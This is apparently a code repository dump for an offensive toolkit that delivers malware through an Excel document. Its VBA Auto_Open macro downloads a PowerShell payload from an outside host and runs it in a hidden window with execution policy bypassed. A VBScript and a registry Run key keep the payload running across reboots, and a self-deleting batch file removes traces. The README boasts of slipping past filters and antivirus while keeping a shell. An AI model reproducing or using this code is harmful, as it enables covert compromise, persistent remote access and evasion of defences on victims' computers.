├── RemovePayload.bat ├── Cleanup.ps1 ├── ChangeLog.txt ├── README.md ├── persist.vbs └── MacroCode /RemovePayload.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | timeout /t 30 4 | del /Q "C:\Temp\payload.ps1" 5 | del /Q "%~f0" 6 | -------------------------------------------------------------------------------- /Cleanup.ps1: -------------------------------------------------------------------------------- 1 | $Path = "C:\Temp\persist.vbs" 2 | If(Test-Path -Path $Path){ 3 | Remove-Item($Path) 4 | } 5 | 6 | $RegKeyPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" 7 | $Value = (Get-ItemProperty $RegKeyPath).Persist -eq $null 8 | If ($Value -eq $False) {Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Persist} 9 | Else { } 10 | -------------------------------------------------------------------------------- /ChangeLog.txt: -------------------------------------------------------------------------------- 1 | Changes made as of 1/4/13 2 | 3 | -Revamped code by adding functions in the VBA 4 | -Added system architecture checks. All you have to do now is host one 32bit payload and the macro will chose the proper 5 | powershell path. 6 | -Added a self-deleting bat to remove the payload off of the system. 7 | -Updated the persist script to also do system architecture checks and choose the correct powershell path. 8 | -Updated the cleanup script 9 | 10 | 11 | --- @enigma0x3 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Powershell-payload-Excel-Delivery 2 | ================================= 3 | 4 | Follow me on Twitter: @enigma0x3 5 | 6 | Contains automatic persistence. 7 | 8 | 9 | Persist.vbs, a 32 bit payload and the bat file need to be accessible to the target (such as a webserver). 10 | 11 | This attack uses an excel document to get into the organization (bypassing filters and scans), determines the system's architecture, pulls down the payload and executes it. It then pulls down a persistence script, drops it, creates a registry key for autorun for the persistence script. Once done, it also drops a self-deleting bat file that removes the initial payload from the system. 12 | 13 | Once the payload is ran, it runs in the powershell process, so if the user closes excel, you keep your shell. You also remain in a stable process until reboot, so migration is not needed. AV also does not pick this up. 14 | 15 | Shoutout to @TheColonial for helping me with the code for hiding the window upon payload execution and testing the code as it was developed. Big thanks mate :) 16 | 17 | PowerSploit Function: Invoke-Shellcode 18 | Author: Matthew Graeber (@mattifestation) 19 | License: BSD 3-Clause 20 | Required Dependencies: None 21 | Optional Dependencies: None 22 | -------------------------------------------------------------------------------- /persist.vbs: -------------------------------------------------------------------------------- 1 | Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP") 2 | 3 | Dim bStrm: Set bStrm = CreateObject("Adodb.Stream") 4 | 5 | Dim filesys 6 | 7 | 8 | 9 | 10 | Const HIDDEN_WINDOW = 0 11 | 12 | If GetObject("winmgmts:root\cimv2:Win32_Processor='cpu0'").AddressWidth = 32 Then 13 | xHttp.Open "GET", "http://192.168.1.127/x32.ps1", False 14 | xHttp.Send 15 | with bStrm 16 | .type = 1 17 | .open 18 | .write xHttp.ResponseBody 19 | .savetofile "C:\temp\payload.ps1" 20 | end with 21 | strComputer = "." 22 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 23 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 24 | Set objConfig = objStartup.SpawnInstance_ 25 | objConfig.ShowWindow = HIDDEN_WINDOW 26 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") 27 | objProcess.Create "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -file C:\Temp\payload.ps1", Null, objConfig, intProcessID 28 | 29 | 30 | 31 | Else 32 | 33 | xHttp.Open "GET", "http://192.168.1.127/x32.ps1", False 34 | xHttp.Send 35 | with bStrm 36 | .type = 1 37 | .open 38 | .write xHttp.ResponseBody 39 | .savetofile "C:\temp\payload.ps1" 40 | end with 41 | strComputer = "." 42 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 43 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 44 | Set objConfig = objStartup.SpawnInstance_ 45 | objConfig.ShowWindow = HIDDEN_WINDOW 46 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") 47 | objProcess.Create "C:\\Windows\\sysWOW64\\WindowsPowerShell\\v1.0\\Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -file C:\Temp\payload.ps1", Null, objConfig, intProcessID 48 | 49 | 50 | End If 51 | 52 | 53 | WScript.Sleep 30000 54 | Set filesys = CreateObject("Scripting.FileSystemObject") 55 | If filesys.FileExists("C:\Temp\payload.ps1") Then 56 | filesys.DeleteFile "C:\Temp\payload.ps1" 57 | End If 58 | -------------------------------------------------------------------------------- /MacroCode: -------------------------------------------------------------------------------- 1 | Sub Auto_Open() 2 | Download 3 | If GetObject("winmgmts:root\cimv2:Win32_Processor='cpu0'").AddressWidth = 32 Then 4 | Execute32 5 | Else 6 | Execute64 7 | End If 8 | Persist 9 | DropBat 10 | RemovePayload 11 | End Sub 12 | 13 | Public Function Download() As Variant 14 | 15 | Dim FileNum As Long 16 | Dim FileData() As Byte 17 | Dim MyFile As String 18 | Dim WHTTP As Object 19 | 20 | On Error Resume Next 21 | Set WHTTP = CreateObject("WinHTTP.WinHTTPrequest.5") 22 | If Err.Number <> 0 Then 23 | Set WHTTP = CreateObject("WinHTTP.WinHTTPrequest.5.1") 24 | End If 25 | On Error GoTo 0 26 | 27 | MyFile = "http://192.168.1.127/x32.ps1" 28 | 29 | WHTTP.Open "GET", MyFile, False 30 | WHTTP.Send 31 | FileData = WHTTP.ResponseBody 32 | Set WHTTP = Nothing 33 | 34 | If Dir("C:\Temp", vbDirectory) = Empty Then MkDir "C:\Temp" 35 | FileNum = FreeFile 36 | Open "C:\Temp\payload.ps1" For Binary Access Write As #FileNum 37 | Put #FileNum, 1, FileData 38 | Close #FileNum 39 | 40 | End Function 41 | Public Function Execute32() As Variant 42 | 43 | Const HIDDEN_WINDOW = 0 44 | strComputer = "." 45 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 46 | 47 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 48 | Set objConfig = objStartup.SpawnInstance_ 49 | objConfig.ShowWindow = HIDDEN_WINDOW 50 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") 51 | objProcess.Create "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -file C:\Temp\payload.ps1", Null, objConfig, intProcessID 52 | 53 | 54 | End Function 55 | 56 | Public Function Execute64() As Variant 57 | Const HIDDEN_WINDOW = 0 58 | strComputer = "." 59 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 60 | 61 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 62 | Set objConfig = objStartup.SpawnInstance_ 63 | objConfig.ShowWindow = HIDDEN_WINDOW 64 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") 65 | objProcess.Create "C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -file C:\Temp\payload.ps1", Null, objConfig, intProcessID 66 | End Function 67 | 68 | Public Function Persist() As Variant 69 | Dim FileNum1 As Long 70 | Dim FileData1() As Byte 71 | Dim MyFile1 As String 72 | Dim WHTTP1 As Object 73 | Dim WshShell As Object 74 | 75 | On Error Resume Next 76 | Set WHTTP1 = CreateObject("WinHTTP.WinHTTPrequest.5") 77 | If Err.Number <> 0 Then 78 | Set WHTTP1 = CreateObject("WinHTTP.WinHTTPrequest.5.1") 79 | End If 80 | On Error GoTo 0 81 | 82 | MyFile1 = "http://192.168.1.127/persist.vbs" 83 | 84 | WHTTP1.Open "GET", MyFile1, False 85 | WHTTP1.Send 86 | FileData1 = WHTTP1.ResponseBody 87 | Set WHTT1P = Nothing 88 | 89 | If Dir("C:\Temp", vbDirectory) = Empty Then MkDir "C:\Temp" 90 | FileNum1 = FreeFile 91 | Open "C:\Temp\persist.vbs" For Binary Access Write As #FileNum1 92 | Put #FileNum1, 1, FileData1 93 | Close #FileNum1 94 | 95 | 96 | Set WshShell = CreateObject("WScript.Shell") 97 | WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Persist", "C:\Temp\persist.vbs", "REG_SZ" 98 | Set WshShell = Nothing 99 | 100 | 101 | 102 | End Function 103 | 104 | 105 | Public Function DropBat() As Variant 106 | Dim FileNum2 As Long 107 | Dim FileData2() As Byte 108 | Dim MyFile2 As String 109 | Dim WHTTP2 As Object 110 | 111 | On Error Resume Next 112 | Set WHTTP2 = CreateObject("WinHTTP.WinHTTPrequest.5") 113 | If Err.Number <> 0 Then 114 | Set WHTTP2 = CreateObject("WinHTTP.WinHTTPrequest.5.1") 115 | End If 116 | On Error GoTo 0 117 | 118 | MyFile2 = "http://192.168.1.127/remove.bat" 119 | 120 | WHTTP2.Open "GET", MyFile2, False 121 | WHTTP2.Send 122 | FileData2 = WHTTP2.ResponseBody 123 | Set WHTTP2 = Nothing 124 | 125 | If Dir("C:\Temp", vbDirectory) = Empty Then MkDir "C:\Temp" 126 | FileNum2 = FreeFile 127 | Open "C:\Temp\remove.bat" For Binary Access Write As #FileNum2 128 | Put #FileNum2, 1, FileData2 129 | Close #FileNum2 130 | 131 | End Function 132 | 133 | 134 | Public Function RemovePayload() As Variant 135 | 136 | Const HIDDEN_WINDOW = 0 137 | strComputer = "." 138 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 139 | 140 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 141 | Set objConfig = objStartup.SpawnInstance_ 142 | objConfig.ShowWindow = HIDDEN_WINDOW 143 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") 144 | objProcess.Create "C:\\WINDOWS\\system32\\cmd.exe /C C:\Temp\remove.bat", Null, objConfig, intProcessID 145 | 146 | End Function 147 | 148 | --------------------------------------------------------------------------------